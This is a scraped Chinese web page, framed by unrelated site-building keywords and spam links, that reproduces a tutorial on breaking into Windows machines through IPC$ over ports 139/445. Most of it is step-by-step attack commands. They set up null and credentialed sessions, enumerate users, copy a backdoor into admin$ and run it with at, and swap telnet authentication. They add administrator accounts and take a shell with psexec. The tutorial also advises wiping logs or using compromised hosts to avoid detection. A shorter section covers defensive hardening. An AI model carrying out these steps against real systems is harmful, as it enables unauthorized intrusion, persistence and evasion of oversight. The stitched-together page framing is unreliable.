当前位置: 首页 > news >正文

介休做网站晋江企业网站建设

介休做网站,晋江企业网站建设,宝塔做网站443链接,采购公告 校园网站建设如何利用445端口进行入侵渗透 445端口入侵原因详细解析。大家在进行入侵渗透个人电脑的时候#xff0c;经常会碰到各种各样的端口#xff0c;比如135#xff0c;1433#xff0c;445#xff0c;3306等端口#xff0c;现在小编就给大家讲解下445端口如何入侵。 445端口入侵…如何利用445端口进行入侵渗透 445端口入侵原因详细解析。大家在进行入侵渗透个人电脑的时候经常会碰到各种各样的端口比如13514334453306等端口现在小编就给大家讲解下445端口如何入侵。 445端口入侵在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口   445端口入侵详解    关于“445端口入侵”的内容 445端口入侵详解 本站搜索更多关于“445端口入侵”的内容 445端口入侵在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢 445端口就是IPC 服务的默认端口                                                          ipc$ 一 摘要 网上关于 ipc$入侵的文章可谓多如牛毛攻击步骤甚至已经成为了固化的模式因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说我认为这些文章讲解的并不详细一些内容甚至是错误的以致对 ipc$的提问几乎占了各大安全论坛讨论区的半壁江山而且这些问题常常都是重复的严重影响了论坛质量和学习效率因此我总结了这篇文章希望能把 ipc$这部分东西尽量说清楚。 注意本文所讨论的各种情况均默认发生在 win NT/2000 环境下 win98 将不在此次讨论之列。 二 什么是 ipc$ IPC$(Internet Process Connection) 是共享 命名管道 的资源它是为了让进程间通信而开放的命名管道通过提供可信任的用户名和口令连接双方可以建立安全的通道并以此通道进行加密数据的交换从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能它有一个特点即在同一时间内两个 IP 之间只允许建立一个连接。NT/2000 在提供了 ipc$ 功能的同时在初次安装系统时还打开了默认共享即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录winnt 或 windows(admin$) 共享。所有的这些微软的初衷都是为了方便管理员的管理但在有意无意中导致了系统安全性的降低。 平时我们总能听到有人在说 ipc$ 漏洞 ipc$ 漏洞其实 ipc$ 并不是一个真正意义上的漏洞 , 我想之所以有人这么说一定是指微软自己安置的那个‘后门空会话 Null session 。那么什么是空会话呢 三 什么是空会话 在介绍空会话之前我们有必要了解一下一个安全会话是如何建立的。 在 Windows NT 4.0 中是使用挑战响应协议与远程机器建立一个会话的建立成功的会话将成为一个安全隧道建立双方通过它互通信息这个过程的大致顺序如下 1 会话请求者客户向会话接收者服务器传送一个数据包请求安全隧道的建立 2 服务器产生一个随机的 64 位数实现挑战传送回客户 3 客户取得这个由服务器产生的 64 位数用试图建立会话的帐号的口令打乱它将结果返回到服务器实现响应 4 服务器接受响应后发送给本地安全验证 LSA LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号核实本地发生如果请求的帐号是一个域的帐号响应传送到域控制器去核实。当对挑战的响应核实为正确后一个访问令牌产生然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。 以上是一个安全会话建立的大致过程那么空会话又如何呢 空会话是在没有信任的情况下与服务器建立的会话即未提供用户名与密码但根据 WIN2000的访问控制模型空会话的建立同样需要提供一个令牌可是空会话在建立过程中并没有经过用户信息的认证所以这个令牌中不包含用户信息因此这个会话不能让系统间发送加密信息但这并不表示空会话的令牌中不包含安全标识符 SID 它标识了用户和所属组对于一个空会话 LSA 提供的令牌的SID 是 S- 1-5-7 这就是空会话的 SID 用户名是 ANONYMOUS LOGON这个用户名是可以在用户列表中看到的但是是不能在 SAM 数据库中找到属于系统内置的帐号这个访问令牌包含下面伪装的组 Everyone Network 在安全策略的限制下这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢 四 空会话可以做什么 对于 NT 在默认安全设置下借助空连接可以列举目标主机上的用户和共享访问 everyone权限的共享访问小部分注册表等并没有什么太大的利用价值对 2000 作用更小因为在 Windows 2000和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表而且实现起来也不方便需借助工具。 从这些我们可以看到这种非信任会话并没有多大的用处但从一次完整的 ipc$入侵来看空会话是一个不可缺少的跳板因为我们从它那里可以得到户列表而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的成功的导出用户列表大大增加了猜解的成功率仅从这一点足以说明空会话所带来的安全隐患因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令 1 首先我们先建立一个空会话当然这需要目标开放 ipc$ 命令 net use \\ip\ipc$ /user: 注意上面的命令包括四个空格 net 与 use 中间有一个空格 use 后面一个密码左右各一个空格。 2 查看远程主机的共享资源 命令 net view \\ip 解释前提是建立了空连接后用此命令可以查看远程主机的共享资源如果它开了共享可以得到如下面的结果但此命令不能显示默认共享。 在 \\*.*.*.* 的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看远程主机的当前时间 命令 net time \\ip 解释用此命令可以得到一个远程主机的当前时间。 4 得到远程主机的 NetBIOS 用户名列表需要打开自己的 NBT 命令 nbtstat -A ip 用此命令可以得到一个远程主机的 NetBIOS 用户名列表返回如下结果 Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER 00 UNIQUE Registered OYAMANISHI-H 00 GROUP Registered OYAMANISHI-H 1C GROUP Registered SERVER 20 UNIQUE Registered OYAMANISHI-H 1B UNIQUE Registered OYAMANISHI-H 1E GROUP Registered SERVER 03 UNIQUE Registered OYAMANISHI-H 1D UNIQUE Registered ..__MSBROWSE__.01 GROUP Registered INet~Services 1C GROUP Registered IS~SERVER......00 UNIQUE Registered MAC Address 00-50-8B -9A -2D-37 以上就是我们经常使用空会话做的事情好像也能获得不少东西哟不过要注意一点建立 IPC$ 连接的操作会在 Event Log 中留下记录不管你是否登录成功。 好了那么下面我们就来看看 ipc$ 所使用的端口是什么 五 ipc$ 所使用的端口 首先我们来了解一些基础知识 1 SMBServer Message Block) Windows 协议族用于文件打印共享的服务 2 NBTNETBios Over TCP/IP) 使用 137 UDP 138 UDP 139 TCP 端口实现基于 TCP/IP 协议的 NETBIOS 网络互联。 3 在 WindowsNT 中 SMB 基于 NBT 实现即使用 139 TCP 端口而在 Windows2000 中 SMB 除了基于 NBT 实现还可以直接通过 445 端口实现。 有了这些基础知识我们就可以进一步来讨论访问网络共享对端口的选择了 对于 win2000 客户端发起端来说 1 如果在允许 NBT 的情况下连接服务器时客户端会同时尝试访问 139 和 445 端口如果 445 端口有响应那么就发送 RST包给 139 端口断开连接用 455 端口进行会话当 445 端口无响应时才使用 139 端口如果两个端口都没有响应则会话失败 2 如果在禁止 NBT 的情况下连接服务器时那么客户端只会尝试访问 445 端口如果 445 端口无响应那么会话失败。 对于 win2000 服务器端来说 1 如果允许 NBT, 那么 UDP 端口 137, 138, TCP 端口 139, 445 将开放 LISTENING 2 如果禁止 NBT 那么只有 445 端口开放。 我们建立的 ipc$ 会话对端口的选择同样遵守以上原则。显而易见如果远程服务器没有监听 139 或 445 端口 ipc$ 会话是无法建立的。 六 ipc 管道在 hack 攻击中的意义 ipc 管道本来是微软为了方便管理员进行远程管理而设计的但在入侵者看来开放 ipc 管道的主机似乎更容易得手。通过 ipc管道我们可以远程调用一些系统函数大多通过工具实现但需要相应的权限这往往是入侵成败的关键。如果不考虑这些仅从传送文件这一方面ipc 管道已经给了入侵者莫大的支持甚至已经成为了最重要的传输手段因此你总能在各大论坛上看到一些朋友因为打不开目标机器的 ipc管道而一筹莫展大呼救命。当然我们也不能忽视权限在 ipc管道中扮演的重要角色想必你一定品尝过空会话的尴尬没有权限开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限那么 ipc管道这把双刃剑将显示出它狰狞的一面。 七 ipc$ 连接失败的常见原因 以下是一些常见的导致 ipc$ 连接失败的原因 1 IPC 连接是 Windows NT 及以上系统中特有的功能由于其需要用到 Windows NT 中很多 DLL 函数所以不能在Windows 9.x/Me 系统中运行也就是说只有 nt/2000/xp 才可以相互建立 ipc$ 连接 98/me 是不能建立ipc$ 连接的 2 如果想成功的建立一个 ipc$ 连接就需要响应方开启 ipc$ 共享即使是空连接也是这样如果响应方关闭了 ipc$ 共享将不能建立连接 3 连接发起方未启动 Lanmanworkstation 服务显示名为 Workstation 它提供网络链结和通讯没有它发起方无法发起连接请求 4 响应方未启动 Lanmanserver 服务显示名为 Server 它提供了 RPC 支持、文件、打印以及命名管道共享 ipc$ 依赖于此服务没有它主机将无法响应发起方的连接请求不过没有它仍可发起 ipc$ 连接 5 响应方未启动 NetLogon 它支持网络上计算机 pass-through 帐户登录身份不过这种情况好像不多 6 响应方的 139 445 端口未处于监听状态或被防火墙屏蔽 7 连接发起方未打开 139 445 端口 8 用户名或者密码错误如果发生这样的错误系统将给你类似于 无法更新密码 这样的错误提示显然空会话排除这种错误 9 命令输入错误可能多了或少了空格当用户名和密码中不包含空格时两边的双引号可以省略如果密码为空可以直接输入两个引号 即可 10 如果在已经建立好连接的情况下对方重启计算机那么 ipc$ 连接将会自动断开需要重新建立连接。 另外 , 你也可以根据返回的错误号分析原因 错误号 5 拒绝访问很可能你使用的用户不是管理员权限的 错误号 51 Windows 无法找到网络路径网络有问题 错误号 53 找不到网络路径 ip 地址错误目标未开机目标 lanmanserver 服务未启动目标有防火墙端口过滤 错误号 67 找不到网络名你的 lanmanworkstation 服务未启动或者目标删除了 ipc$ 错误号 1219 提供的凭据与已存在的凭据集冲突你已经和对方建立了一个 ipc$ 请删除再连 错误号 1326 未知的用户名或错误密码原因很明显了 错误号 1792 试图登录但是网络登录服务没有启动目标 NetLogon 服务未启动 错误号 2242 此用户的密码已经过期目标有帐号策略强制定期要求更改密码。 八 复制文件失败的原因 有些朋友虽然成功的建立了 ipc$ 连接但在 copy 时却遇到了这样那样的麻烦无法复制成功那么导致复制失败的常见原因又有哪些呢 1 对方未开启共享文件夹 这类错误出现的最多占到 50% 以上。许多朋友在 ipc$连接建立成功后甚至都不知道对方是否有共享文件夹就进行盲目复制结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用 netview \\IP 这个命令看一下你想要复制的共享文件夹是否存在用软件查看当然更好不要认为能建立 ipc$ 连接就一定有共享文件夹存在。 2 向默认共享复制失败 这类错误也是大家经常犯的主要有两个小方面 1 错误的认为能建立 ipc$ 连接的主机就一定开启了默认共享因而在建立完连接之后马上向 c$,d$,admin$之类的默认共享复制文件一旦对方未开启默认共享将导致复制失败。 ipc$ 连接成功只能说明对方打开了 ipc$共享并不能说明默认共享一定存在。 ipc$ 共享与默认共享是 两码 事 ipc$共享是一个命名管道并不是哪个实际的文件夹而默认共享却是实实在在的共享文件夹 2 由于 net view \\IP 这个命令无法显示默认共享文件夹因为默认共享带 $因此通过这个命令我们并不能判断对方是否开启了默认共享因此如果对方未开启默认共享那么所有向默认共享进行的操作都不能成功不过大部分扫描软件在扫弱口令的同时都能扫到默认共享目录可以避免此类错误的发生 要点请大家一定区分 ipc 共享默认共享普通共享这三者的区别 ipc 共享是一个管道并不是实际的共享文件夹默认共享是安装时默认打开的文件夹普通共享是我们自己开启的可以设置权限的共享文件夹。 3 用户权限不够包括四种情形 1 空连接向所有共享默认共享和普通共享复制时权限是不够的 2 向默认共享复制时在 Win2000 Pro 版中只有 Administrators 和 Backup Operators 组成员才可以在 Win2000 Server 版本 Server Operatros 组也可以访问到这些共享目录 3 向普通共享复制时要具有相应权限即对方管理员事先设定的访问权限 4 对方可以通过防火墙或安全软件的设置禁止外部访问共享 注意 1 不要认为 administrator 就一定具有管理员权限管理员名称是可以改的 2 管理员可以访问默认共享的文件夹但不一定能够访问普通的共享文件夹因为管理员可以对普通的共享文件夹进行访问权限设置如图 6 管理员为D 盘设置的访问权限为仅允许名为 xinxin 的用户对该文件夹进行完全访问那么此时即使你拥有管理员权限你仍然不能访问 D盘。不过有意思的是如果此时对方又开启了 D$ 的默认共享那么你却可以访问 D$ 从而绕过了权限限制有兴趣的朋友可以自己做测试。 4 被防火墙杀死或在局域网 还有一种情况那就是也许你的复制操作已经成功但当远程运行时被防火墙杀掉了导致找不到文件或者你把木马复制到了局域网内的主机导致连接失败反向连接的木马不会发生这种情况。如果你没有想到这种情况你会以为是复制上出了问题但实际你的复制操作已经成功了只是运行时出了问题。 呵呵大家也知道 ipc$ 连接在实际操作过程中会出现各种各样的问题上面我所总结的只是一些常见错误没说到的大家可以给我提个醒儿。 九 关于 at 命令和 xp 对 ipc$ 的限制 本来还想说一下用 at 远程运行程序失败的原因但考虑到 at的成功率不是很高问题也很多在这里就不提它了提的越多用的人就越多而是推荐大家用 psexec.exe远程运行程序假设想要远程机器执行本地 c:\xinxin.exe 文件且管理员为 administrator 密码为 1234那么输入下面的命令 psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe 如果已经建立 ipc 连接则 -u -p 这两个参数不需要 psexec.exe 将自动拷贝文件到远程机器并运行。 本来 xp 中的 ipc$ 也不想在这里讨论想单独拿出来讨论但看到越来越多的朋友很急切的提问为什么遇到 xp的时候大部分操作都很难成功。我在这里就简单提一下吧在 xp的默认安全选项中任何远程访问仅被赋予来宾权限也就是说即使你是用管理员帐户和密码你所得到的权限也只是 Guest因此大部分操作都会因为权限不够而失败而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了 xp的管理员密码我建议你尽量避开 ipc 管道。 十 如何打开目标的 IPC$ 共享以及其他共享 目标的 ipc$ 不是轻易就能打开的否则就要天下打乱了。你需要一个 admin 权限的 shell 比如 telnet 木马 cmd 重定向等然后在 shell 下执行 net share ipc$ 开放目标的 ipc$ 共享 net share ipc$ /del 关闭目标的 ipc$ 共享如果你要给它开共享文件夹你可以用 net share xinxinc:\ 这样就把它的 c 盘开为共享名为 xinxin 共享文件夹了。可是我发现很多人错误的认为开共享文件夹的命令是 net share c$ 还大模大样的给菜鸟指指点点真是误人子弟了。再次声明这些操作都是在 shell 下才能实现的。 十一 一些需要 shell 才能完成的命令 看到很多教程这方面写的十分不准确一些需要 shell 才能完成命令就简简单单的在 ipc$ 连接下执行了起了误导作用。那么下面我总结一下需要在 shell 才能完成的命令 1 向远程主机建立用户激活用户修改用户密码加入管理组的操作需要在 shell 下完成 2 打开远程主机的 ipc$ 共享默认共享普通共享的操作需要在 shell 下完成 3 运行 / 关闭远程主机的服务需要在 shell 下完成 4 启动 / 杀掉远程主机的进程也需要在 shell 下完成用软件的情况下除外如 pskill 。 十二 入侵中可能会用到的命令 为了这份教程的完整性我列出了 ipc$入侵中的一些常用命令如果你已经掌握了这些命令你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程如果只适用于本地你只能在获得远程主机的 shell 如 cmd telnet 等后才能向远程主机执行。 1 建立 / 删除 ipc$ 连接的命令 1 建立空连接 : net use \\127.0.0.1\ipc$ /user: 2 建立非空连接 : net use \\127.0.0.1\ipc$ 密码 /user: 用户名 3 删除连接 : net use \\127.0.0.1\ipc$ /del 2 在 ipc$ 连接中对远程主机的操作命令 1 查看远程主机的共享资源看不到默认共享 : net view \\127.0.0.1 2 查看远程主机的当前时间 : net time \\127.0.0.1 3 得到远程主机的 netbios 用户名列表 : nbtstat -A 127.0.0.1 4 映射 / 删除远程共享 : net use z: \\127.0.0.1\c 此命令将共享名为 c 的共享资源映射为本地 z 盘 net use z: /del 删除映射的 z 盘其他盘类推 5 向远程主机复制文件 : copy 路径 \ 文件名 \\IP\ 共享目录名如 copy c:\xinxin.exe \\127.0.0.1\c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内 当然你也可以把远程主机上的文件复制到自己的机器里 copy \\127.0.0.1\c$\xinxin.exe c:\ 6 远程添加计划任务 : at \\IP 时间 程序名 如 at \\127.0.0.0 11:00 xinxin.exe 注意时间尽量使用 24 小时制如果你打算运行的程序在系统默认搜索路径比如 system32/ 下则不用加路径否则必须加全路径 3 本地命令 1 查看本地主机的共享资源可以看到本地的默认共享 net share 2 得到本地主机的用户列表 net user 3 显示本地某用户的帐户信息 net user 帐户名 4 显示本地主机当前启动的服务 net start 5 启动 / 关闭本地服务 net start 服务名 net stop 服务名 6 在本地添加帐户 net user 帐户名 密码 /add 7 激活禁用的用户 net uesr 帐户名 /active:yes 8 加入管理员组 net localgroup administrators 帐户名 /add 很显然的是虽然这些都是本地命令但如果你在远程主机的 shell 中输入比如你 telnet 成功后输入上面这些命令那么这些本地输入将作用在远程主机上。 4 其他一些命令 1 telnet telnet IP 端口 telnet 127.0.0.0 23 2 用 opentelnet.exe 开启远程主机的 telnet OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port OpenTelnet.exe \\127.0.0.1 administrator 1 90 不过这个小工具需要满足四个要求 1 目标开启了 ipc$ 共享 2 你要拥有管理员密码和帐号 3 目标开启 RemoteRegistry 服务用户就可以更改 ntlm 认证 4 对仅 WIN2K/XP 有效 3 用 psexec.exe 一步获得 shell 需要 ipc 管道支持 psexec.exe \\IP -u 管理员帐号 -p 密码 cmd psexec.exe \\127.0.0.1 -u administrator -p cmd 十三 对比过去和现今的 ipc$ 入侵 既然是对比那么我就先把过去的 ipc$ 入侵步骤写给大家都是蛮经典的步骤 [1] C:\net use \\127.0.0.1\ipc$ /user:admintitrators \\ 用扫到的空口令建立连接   [2] c:\net view \\127.0.0.1 \\ 查看远程的共享资源 [3] C:\copy srv.exe \\127.0.0.1\admin$\system32 \\ 将一次性后门 srv.exe 复制到对方的系统文件夹下前提是 admin$ 开启   [4] C:\net time \\127.0.0.1 \\ 查看远程主机的当前时间 [5] C:\at \\127.0.0.1 时间 srv.exe \\ 用 at 命令远程运行 srv.exe 需要对方开启了 Task Scheduler 服务   [6] C:\net time \\127.0.0.1 \\ 再次查看当前时间来估算 srv.exe 是否已经运行此步可以省略 [7] C:\telnet 127.0.0.1 99 \\ 开一个新窗口用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思那你就把它想象成远程机器的控制权就好了操作像 DOS) 99 端口是 srv.exe 开的一次性后门的端口   [8] C:\WINNT\system32net start telnet \\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务毕竟 srv.exe 是一次性的后门我们需要一个长久的后门便于以后访问如果对方的 telnet 已经启动此步可省略 [9] C:\copy ntlm.exe \\127.0.0.1\admin$\system32 \\ 在原来那个窗口中将 ntlm.exe 传过去 ntlm.exe 是用来更改 telnet 身份验证的   [10] C:\WINNT\system32ntlm.exe \\ 在 shell 窗口中运行 ntlm.exe 以后你就可以畅通无阻的 telnet 这台主机了 [11] C:\telnet 127.0.0.1 23 \\ 在新窗口中 telnet 到 127.0.0.1 端口 23 可省略这样我们又获得一个长期的后门 [12] C:\WINNT\system32net user 帐户名 密码 /add C:\WINNT\system32net uesr guest /active:yes C:\WINNT\system32net localgroup administrators 帐户名 /add \\telnet 上以后你可以建立新帐户激活 guest 把任何帐户加入管理员组等 好了写到这里我似乎回到了 2 3 年前那时的 ipc$ 大家都是这么用的不过随着新工具的出现上面提到的一些工具和命令现在已经不常用到了那就让我们看看现在的高效而简单的 ipc$ 入侵吧。 [1] psexec.exe \\IP -u 管理员帐号 -p 密码 cmd \\ 用这个工具我们可以一步到位的获得 shell OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port \\ 用它可以方便的更改 telnet 的验证方式和端口方便我们登陆 [2] 已经没有第二步了用一步获得 shell 之后你做什么都可以了安后门可以用 winshell 克隆就用 ca 吧开终端用 3389.vbe 记录密码用 win2kpass 总之好的工具不少随你选了我就不多说了。 十四 如何防范 ipc$ 入侵 1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 ) 运行 regedit 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 把 RestrictAnonymous DWORD 的键值改为 1 如果设置为 1 一个匿名用户仍然可以连接到 IPC$ 共享但无法通过这种连接得到列举 SAM 帐号和共享信息的权限在 Windows2000 中增加了 2 未取得匿名权的用户将不能进行 ipc$ 空连接。建议设置为 1。如果上面所说的主键不存在就新建一个再改键值。如果你觉得改注册表麻烦可以在本地安全设置中设置此项 在本地安全设置本地策略安全选项 对匿名连接的额外限制 2 禁止默认共享 1 察看本地共享资源 运行 -cmd- 输入 net share 2 删除共享重起后默认共享仍然存在 net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete 如果有 e,f, ……可以继续删除 3 停止 server 服务 net stop server /y 重新启动后 server 服务会重新开启 4 禁止自动打开默认共享此操作并不能关闭 ipc$ 共享 运行 -regedit server 版 : 找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareServer DWORD 的键值改为 :00000000 。 pro 版 : 找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks DWORD 的键值改为 :00000000 。 这两个键值在默认情况下在主机上是不存在的需要自己手动添加修改后重起机器使设置生效。 3 关闭 ipc$ 和默认共享依赖的服务 :server 服务 如果你真的想关闭 ipc$ 共享那就禁止 server 服务吧 控制面板 - 管理工具 - 服务 - 找到 server 服务右击 - 属性 - 常规 - 启动类型 - 选已禁用这时可能会有提示说 XXX 服务也会关闭是否继续因为还有些次要的服务要依赖于 server 服务不要管它。 4 屏蔽 139 445 端口 由于没有以上两个端口的支持是无法建立 ipc$ 的因此屏蔽 139 445 端口同样可以阻止 ipc$ 入侵。 1 139 端口可以通过禁止 NBT 来屏蔽 本地连接 TCP/IT 属性高级 WINS 选‘禁用 TCP/IT 上的 NETBIOS 一项 2 445 端口可以通过修改注册表来屏蔽 添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\Controlset\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD value: 0 修改完后重启机器 注意如果屏蔽掉了以上两个端口你将无法用 ipc$ 入侵别人。 3 安装防火墙进行端口过滤 6 设置复杂密码防止通过 ipc$ 穷举出密码我觉得这才是最好的办法增强安全意识比不停的打补丁要安全的多。 十五 ipc$ 入侵问答精选 上面说了一大堆的理论东西但在实际中你会遇到各种各样的问题因此为了给予大家最大的帮助我整理了各大安全论坛中一些有代表性的问答其中的一些答案是我给出的一些是论坛上的回复如果有什么疑问可以来找我讨论。 1. 进行 ipc$ 入侵的时候会在服务器中留下记录有什么办法可以不让服务器发现吗 答留下记录是一定的你走后用清除日志程序删除就可以了或者用肉鸡入侵。 2. 你看下面的情况是为什么可以连接但不能复制 net use \\***.***.***.***\ipc$ 密码 /user: 用户名 命令成功 copy icmd.exe \\***.***.***.***\admin$ 找不到网络路径 命令不成功 答像“找不到网络路径”“找不到网络名”之类的问题大多是因为你想要复制到的共享文件夹没有开启所以在复制的时候会出现错误你可以试着找找其他的共享文件夹。 3. 如果对方开了 IPC$ 且能建立空联接但打开 C 、 D 盘时都要求密码我知道是空连接没有太多的权限但没别的办法了吗 答建议先用流光或者别的什么扫描软件试着猜解一下密码如果猜不出来只能放弃毕竟空连接的能力有限。 4. 我已经猜解到了管理员的密码且已经 ipc$ 连接成功了但 net view \\ip 发现它没开默认共享我该怎么办 答首先纠正你的一个错误用 net view \\ip 是无法看到默认共享的你可以试着将文件复制到 c$ d$ 看看如果都不行说明他关闭了默认共享那你就用 opentelnet.exe 或 psexec.exe 吧用法上面有。 5.ipc$ 连接成功后我用下面的命令建立了一个帐户却发现这个帐户在我自己的机器上这是怎么回事 net uset ccbirds /add 答 ipc$ 建立成功只能说明你与远程主机建立了通信隧道并不意味你取得了一个 shell 只有在获得一个 shell 比如 telnet 之后你才能在远程机器建立一个帐户否则你的操作只是在本地进行。 6. 我已进入了一台肉机用的管理员帐号可以看他的系统时间但是复制程序到他的机子上却不行每次都提示“拒绝访问已复制 0 个文件”是不是对方有什么服务没开我该怎么办 答一般来说“拒绝访问”都是权限不够的结果可能是你用的帐户有问题还有一种可能如果你想向普通共享文件夹复制文件却返回这个错误说明这个文件夹设置的允许访问用户中不包括你哪怕你是管理员这一点我在上一期文章中分析了。 7. 我用 Win98 能与对方建立 ipc$ 连接吗 答理论上不可以要进行 ipc$ 的操作建议用 win2000 用其他操作系统会带来许多不必要的麻烦。 8. 我用 net use \\ip\ipc$ /user 成功的建立了一个空会话但用 nbtstat -A IP 却无法导出用户列表这是为什么 答空会话在默认的情况下是可以导出用户列表的但如果管理员通过修改注册表来禁止导出列表就会出现你所说的情况还有可能是你自己的 NBT 没有打开 netstat 命令是建立在 NBT 之上的。   9. 我建立 ipc$ 连接的时候返回如下信息‘提供的凭据与已存在的凭据集冲突怎么回事 答呵呵这说明你已经与目标主机建立了 ipc$ 连接两个主机间同时建立两个 ipc$ 连接是不允许的。 10. 我在映射的时候出现 F:\net use h: \\211.161.134.*\e$ 系统发生 85 错误。 本地设备名已在使用中。这是怎么回事 答你也太粗心了吧这说明你有一个 h 盘了映射到没有的盘符吧 11. 我建立了一个连接 f:\net use \\*.*.*.*\ipc$ 123 /user:guest 成功了但当我映射时出现了错误向我要密码怎么回事 F:\net use h: \\*.*.*.*\c$ 密码在 \\*.*.*.*\c$ 无效。 请键入 \\*.*.*.*\c$ 的密码 : 系统发生 5 错误。 拒绝访问。 答呵呵向你要密码说明你当前使用的用户权限不够不能映射 C$ 这个默认共享想办法提升权限或者找管理员的弱口令吧默认共享一般是需要管理员权限的。 12. 我用 superscan 扫到了一个开了 139 端口的主机但为什么不能空连接呢 答你混淆了 ipc$ 与 139 的关系能进行 ipc$ 连接的主机一定开了 139 或 445 端口但开这两个端口的主机可不一定能空连接因为对方可以关闭 ipc$ 共享 . 13. 我们局域网里的机器大多都是 xp 我用流光扫描到几个 administrator 帐号口令是空而且可以连接但不能复制东西说错误 5 。请问为什么 答 xp 的安全性要高一些在安全策略的默认设置中对本地帐户的网络登录进行身份验证的时候默认为来宾权限即使你用管理员远程登录也只具有来宾权限因此你复制文件当然是错误 5 权限不够。 14. 我用 net use \\192.168.0.2\ipc$ password /user:administrator 成功可是 net use i: \\192.168.0.2\c 出现请键入 \\192.168.0.2 的密码怎么回事情呢我用的可是管理员呀应该什么都可以访问呀 答虽然你具有管理员权限但管理员在设置 c 盘共享权限时注意普通共享可以设置访问权限而默认共享则不能可能并未设置允许 administrator 访问所以会出现上述问题。 15. 如果自己的机器禁止了 ipc$, 是不是还可以用 ipc$ 连接别的机器如果禁止 server 服务呢 答禁止以上两项仍可以发起 ipc$ 连接不过这种问题自己动手试验会更好。 16. 能告诉我下面的两个错误产生的原因吗 c:\net time \\61.225.*.* 系统发生 5 错误。 拒绝访问。 c:\net view \\61.225.*.* 系统发生 5 错误。 拒绝访问。 答起初遇到这个问题的时候我也很纳闷错误 5表示权限不够可是连空会话的权限都可以完成上面的两个命令他为什么不行呢难道是他没建立连接后来那个粗心的同志告诉我的确是这样他忘记了自己已经删了 ipc$ 连接之后他又输入了上面那两个命令随之发生了错误 5 。 17. 您看看这是怎么回事 F:\net time 找不到时间服务器。 请键入 NET HELPMSG 3912 以获得更多的帮助。 答答案很简单你的命令错了应该是 net time \\ip 没输入 ip 地址当然找不到服务器。 view 的命令也应该有 ip 地址即 net view \\ip
http://www.pierceye.com/news/859944/

相关文章:

  • 建网站平台 优帮云嘉兴营销型网站
  • 建筑类专业做教育的网站ui设计app
  • 郑州做营销型网站的公司什么叫社交电商平台
  • 外国做问卷可以赚钱的网站做中国菜的外国网站
  • 青岛市建设厅网站快递网站建设
  • 昆明网站WordPress文章怎么折叠
  • 拖拽建站系统源码企业主题展厅设计公司
  • asp.net网站的数据库配置张家港网站 设计制作
  • 聊城手机网站建设多少钱扬州网站建设哪个好薇
  • 云南安宁做网站的公司手机网页制作软件中文版
  • 如何做征信公司网站做谷歌推广一定要网站吗
  • 重庆市做网站的公司有哪些苏州网站建设设计公司
  • 网站制作计算机域名解析到网站
  • 自己做的电影网站打开很慢wordpress 防采集
  • 西安专业网站建设公司排名做网站编写
  • 做电影网站还能赚钱云南网站建设哪家公司好
  • 重庆定制网站开发什么是网络营销战略
  • 网站建设硬件方案精准客源app
  • 网站视觉优化怎么做电子商务网站建设参考文献2018
  • 服务器可以吧网站做跳转吗wordpress 远程图片本地化
  • 网站在线访谈栏目建设个人网站可以备案了吗
  • 汉口北做网站搜索广告是什么
  • 电商网站可以用dw做嘉兴网站建设平台
  • 做网站是数据库应该放在哪里建筑工程水平防护网
  • vps网站无法通过ip访问网站怎么做的支付宝接口
  • 怎么创建一个博客网站网站的c4d动画是怎么做的
  • 西安做企业网站科技论文发表网
  • html 手机网站开发企业做网站的合同
  • 建立wordpress网站吗全州建设完小网站
  • 网站域名注册证书是什么制作WordPress友情链接